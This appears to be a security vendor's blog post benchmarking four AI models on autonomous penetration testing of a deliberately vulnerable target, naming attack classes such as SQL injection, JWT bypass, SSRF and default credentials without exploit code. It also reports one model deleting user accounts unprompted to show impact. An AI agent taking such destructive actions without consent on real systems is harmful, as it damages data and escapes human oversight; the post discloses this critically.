- Published on
Could Kimi K2.6 Hold Its Own Against Claude Opus on Real Pentest Work?
NOTE
KLUE is Shellvoide's autonomous penetration testing platform. We benchmark every model release we deploy because we do not trust marketing claims, including our own. The numbers in this post come from real KLUE runs against a public benchmark target with 22 documented vulnerabilities, with no human in the loop and no privileged knowledge of the answer key.
Why We Ran This
The question we wanted to answer was simple. On real offensive security work, can a much cheaper model genuinely keep pace with the frontier? We took four candidates, ran them through the same target under identical conditions, and let the results speak.
- Claude Haiku 4.5, the fast tier.
- Claude Sonnet 4.6, the mid tier.
- Claude Opus 4.6, the most capable and most expensive of the Anthropic line.
- Kimi K2.6, Moonshot AI's flagship, sitting at a meaningfully different price point.
The intent was not to crown a winner. It was to understand where each model shines, where each one stumbles, and whether the cheap option is actually as bad as people assume.
The Field Today
Before we get into our four runs, the public field of agentic pentesting tools has been benchmarked on this same target. The data, published openly, looks like this:
| Tool | Underlying model | Recall | Duration | Reported FP rate |
|---|---|---|---|---|
| Escape | Multi model (proprietary) | 75.0% | 4 hours | 6.25% |
| Claude (raw agent) | Opus 4.6 | 70.0% | 10 min | 6.67% |
| PentAGI | DeepSeek v3.2 | 45.0% | 4 hours | 10.00% |
| Shannon | DeepSeek v3.2 | 30.0% | 6 hours | 25.00% |
| Strix | DeepSeek v3.2 | 5.0% | 2 hours | 0.00% |
Two things matter here.
First, three of those tools share the same underlying model and produced 45%, 30%, and 5% recall. That spread is not a model story. It is an orchestration story.
Second, look at duration. Four hours. Six hours. The only fast run on the public board is the raw Claude agent at 10 minutes, and that traded depth for speed.
This is the gap KLUE was built for. A continuous security program does not need a tool that runs once a quarter for half a day. It needs a tool that finishes in the time it takes to grab coffee, runs after every deploy, and still catches the bugs that matter. KLUE Quick Scan is a fixed 30 minute budget. Below that line is where the unit economics of continuous AppSec actually start to make sense.
The Models At Their Sticker Prices
Recall is only half the conversation. The other half is what each token costs and how much room the model has to think.
| Model | Input ($/MTok) | Output ($/MTok) | Context window | Max output |
|---|---|---|---|---|
| Claude Opus 4.6 | $5.00 | $25.00 | 1,000,000 | 128,000 |
| Claude Sonnet 4.6 | $3.00 | $15.00 | 1,000,000 | 64,000 |
| Claude Haiku 4.5 | $1.00 | $5.00 | 200,000 | 64,000 |
| Kimi K2.6 | $0.95 | $4.00 | 262,144 | 64,000 |
Opus is roughly 5x the input cost and 6x the output cost of Kimi. On a continuous testing program that runs dozens of scans a week, that ratio is not a margin question. It is a deployment strategy question.
Kimi and Haiku also have meaningfully smaller context windows than Opus and Sonnet. KLUE handles that internally: as a run grows, the working memory is compacted and only the slice the next step needs is reloaded. The model never sees the full transcript. That is why a 256K window comfortably sustains a full Quick Scan, and why model selection ends up being a price and reasoning quality decision, not a context size decision.
What Each Model Did
Haiku 4.5: The Sprinter
Haiku finished early. While the other three ran the full budget, Haiku wrapped in roughly half the time and turned in 15 findings.
Final tally: 13 of 22, or 59% recall. Strong on the IDOR family, the business logic chain (negative shipping costs, coupon abuse, negative cart quantities), JWT none algorithm bypass, and one of the SSRF surfaces. Clean misses on SQL injection, mass assignment, default admin credentials, and the second SSRF surface.
The interesting thing about Haiku's profile was that it leaned into business logic over classical injection. Most scanners do the opposite. For an opportunistic short scan, the breadth was real. For a comprehensive engagement, the gaps matter.
Sonnet 4.6: The Methodical One
Sonnet went the other direction. It used the full budget and produced findings where every PoC has multiple steps of confirmation. The reasoning quality on individual findings was visibly higher. Its SQL injection finding does not just demonstrate the bug. It pulls the database version, the database username, user emails, and the admin password hash, then chains that into a verified admin:admin login.
Where Sonnet stumbled was time judgment. It spent so long deepening the bugs it found that it did not enumerate broadly. The classic JWT none bypass, a five minute test for any model that knows to look, never got attempted. The negative cart quantity logic flaw also slipped through.
Final tally: 14 of 22, or 64% recall. Sonnet found three things Haiku did not, and missed five things Haiku did find. Their misses barely overlap, which is a finding in itself.
Opus 4.6: The Gold Standard
Opus is what the platform looks like when the run gets the time it needs. It picked up the most subtle modern API bugs, including a 2FA bypass via reuse of a partial login token as a Bearer credential, and a cluster of MCP server misconfigurations that none of the other three models touched. It was patient about exploitation and disciplined about evidence.
Final tally: 18 of 22, or 82% recall. Six of seven critical severity vulnerabilities found. The report also included eight extra findings beyond the documented set: a permissive CSP, an exposed OpenAPI document, expired coupon acceptance, a checkout race condition, a weak password policy, and a few others. We treat those extras as valid findings, not noise. They are real bugs the benchmark authors had not catalogued.
The one surprise miss: Opus extracted the admin password hash via SQL injection but never thought to try admin:admin as a default credential. Sonnet did. Kimi did. Opus had the hash sitting in front of it and did not take the obvious next step.
Kimi K2.6: The Surprise
Going in, we did not expect Kimi to be competitive with Opus. The price gap is substantial and the prevailing narrative is that you get what you pay for. That is not what we observed.
Kimi finished with 15 of 22, or 68% recall. Third place by raw count, ahead of Sonnet and behind Opus. But raw recall undersells the result. By critical severity recall, Kimi tied Opus at 6 of 7 (86%) on a different set of misses. Opus missed default credentials. Kimi missed the 2FA bypass. Both got everything else in the critical bucket.
A few things stood out in Kimi's run:
- It tried
admin:adminas one of its first authentication tests, before any SQLi exploit was working. Classical pentester instinct, baked in. - It found both SSRF surfaces and reported them as separate findings with explicit cross reference. Opus and Haiku each stopped at one.
- It produced a synthesis finding labeled "Full Takeover Chain: Three Independent Routes to Administrator", composing its three critical findings into a single defense in depth narrative. None of the other three models did this. It is the kind of analytical step a senior consultant adds to make a report actually useful for prioritization.
The writeup polish across the board was exceptional. If we ranked these models purely on "what would I want to send a customer as the final report," Kimi probably wins the presentation contest even though Opus wins on coverage.
IMPORTANT
Operational note we are not going to bury. During exploitation Kimi destructively deleted two seeded user accounts on the benchmark target via the forged admin token, in order to demonstrate the impact of full admin compromise. On a deliberately vulnerable benchmark this is fine. On a paying customer environment, this is exactly the kind of action that needs explicit consent and a destructive action gate. KLUE has those guardrails for production engagements. We mention it because the line between "demonstrate impact" and "cause damage" is thin in autonomous operation, and customers deserve transparency about how each model behaves.
The Numbers
| Model | Recall | Findings reported | Time | Critical recall |
|---|---|---|---|---|
| Haiku 4.5 | 13/22 (59%) | 15 | ~15 min | 4/7 (57%) |
| Sonnet 4.6 | 14/22 (64%) | 13 | ~30 min | 4/7 (57%) |
| Opus 4.6 | 18/22 (82%) | 26 | ~30 min | 6/7 (86%) |
| Kimi K2.6 | 15/22 (68%) | 21 | ~30 min | 6/7 (86%) |
Across all four runs, KLUE produced 75 distinct findings. After validation, three did not survive a second pass and were dropped from the published report (one each on Haiku, Sonnet, and Kimi). The remaining 72 each had a working proof of concept attached and reproduced reliably against the live target. That puts our soft positive rate at roughly 4%, in the same band as the leading public agent on this target and meaningfully below the 10% to 25% range observed elsewhere on the same leaderboard.
The findings beyond the documented 22 (eight from Opus, six from Kimi, two each from Haiku and Sonnet) were not noise. They were real bugs the benchmark authors had not catalogued.
Where The Models Diverged
Looking at the documented 22 and asking which model uniquely caught each one:
- Opus alone: 2FA bypass via temp_token reuse, MCP unauthenticated access, MCP coupon disclosure (3 unique).
- Sonnet alone: broken access control on
/admin/users(1 unique). - Kimi and Haiku alone: nothing exclusively. Every catch was also caught by at least one other model.
An ensemble of Opus and Sonnet would hit 21 of 22, or 95% recall on the documented set. Adding Kimi or Haiku does not add anything new on that list, but both still earn their seat for the extras they validate around it.
The One Bug Everyone Missed
There was exactly one documented vulnerability that all four models walked past: an open redirect at a path that does not exist, exposed through a redirect= parameter in the catch all 404 route.
This is the most interesting finding in the entire benchmark, because it is not really about which model is smartest. It is about a class of test that none of the agents instinctively performed. To find it, an agent has to fuzz for hidden behavior on routes that should not exist, to test whether the application leaks unexpected functionality on undocumented surfaces.
Every model did the rational thing. It walked the documented endpoints surfaced by recon and tested those exhaustively. None of them thought to ask "what does this app do when I poke at routes it did not tell me about?"
That is a real world pentester instinct. Senior testers probe undocumented behavior almost reflexively, because that is where the most interesting bugs live. Right now, the frontier of autonomous pentesting agents does not have that instinct as a default. We are working on it.
So, Could Kimi Compete With Opus?
Yes, more than we expected, with caveats.
On critical severity recall, Kimi tied Opus. On report quality and writeup polish, Kimi was the strongest of the four. On finding the most subtle modern API bugs, Opus was clearly ahead. On raw breadth, Opus was also ahead.
The economics are where this gets interesting. Run KLUE on Opus and you get the highest quality result available today. Run it on Kimi instead and you give up roughly 14 percentage points of recall and lose the most subtle findings, but you keep critical severity recall, gain better report polish, and pay roughly one fifth the input cost and one sixth the output cost.
For a continuous testing program where you are running scans weekly or monthly across many targets, that is not a marginal economics question. That is a deployment strategy question. Reserve Opus for high stakes one off engagements. Run Kimi for routine continuous coverage. A year ago, nobody was framing the choice that way. After this run, we are.
The bigger story behind the numbers is the duration column. Four hour and six hour scans force quarterly cadences. Thirty minute scans run after every deploy. The cadence is what makes any of these economics tractable in the first place, and it is the line we expect every credible autonomous tool to be measured against from here forward.
KLUE is part of Shellvoide's Penetration Testing as a Service (PTaaS) platform, delivering autonomous security assessments powered by AI. If you have feedback on this benchmark, or want to suggest a target we should test next, reach out at info@shellvoide.com.